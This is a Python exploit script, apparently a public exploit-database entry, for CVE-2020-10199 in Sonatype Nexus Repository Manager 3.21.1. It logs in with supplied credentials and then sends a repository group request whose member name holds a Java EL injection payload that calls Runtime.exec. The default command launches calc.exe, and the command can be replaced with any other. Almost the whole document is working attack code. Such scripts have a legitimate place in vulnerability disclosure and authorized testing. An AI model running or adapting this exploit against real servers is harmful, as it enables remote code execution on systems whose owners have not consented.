59 lines
No EOL
1.7 KiB
Python
Executable file
59 lines
No EOL
1.7 KiB
Python
Executable file
# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
|
|
# Exploit Author: 1F98D
|
|
# Original Author: Alvaro Muñoz
|
|
# Date: 27 May 2020
|
|
# Vendor Hompage: https://www.sonatype.com/
|
|
# CVE: CVE-2020-10199
|
|
# Tested on: Windows 10 x64
|
|
# References:
|
|
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
|
|
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
|
|
#
|
|
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
|
|
# to Java EL injection which allows a low privilege user to remotely
|
|
# execute code on the target server.
|
|
#
|
|
#!/usr/bin/python3
|
|
|
|
import sys
|
|
import base64
|
|
import requests
|
|
|
|
URL='http://192.168.1.1:8081'
|
|
CMD='cmd.exe /c calc.exe'
|
|
USERNAME='admin'
|
|
PASSWORD='password'
|
|
|
|
s = requests.Session()
|
|
print('Logging in')
|
|
body = {
|
|
'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
|
|
'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
|
|
}
|
|
r = s.post(URL + '/service/rapture/session',data=body)
|
|
if r.status_code != 204:
|
|
print('Login unsuccessful')
|
|
print(r.status_code)
|
|
sys.exit(1)
|
|
print('Logged in successfully')
|
|
|
|
body = {
|
|
'name': 'internal',
|
|
'online': True,
|
|
'storage': {
|
|
'blobStoreName': 'default',
|
|
'strictContentTypeValidation': True
|
|
},
|
|
'group': {
|
|
'memberNames': [
|
|
'$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
|
|
]
|
|
},
|
|
}
|
|
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
|
|
if 'java.lang.ProcessImpl' in r.text:
|
|
print('Command executed')
|
|
sys.exit(0)
|
|
else:
|
|
print('Error executing command, the following was returned by Nexus')
|
|
print(r.text) |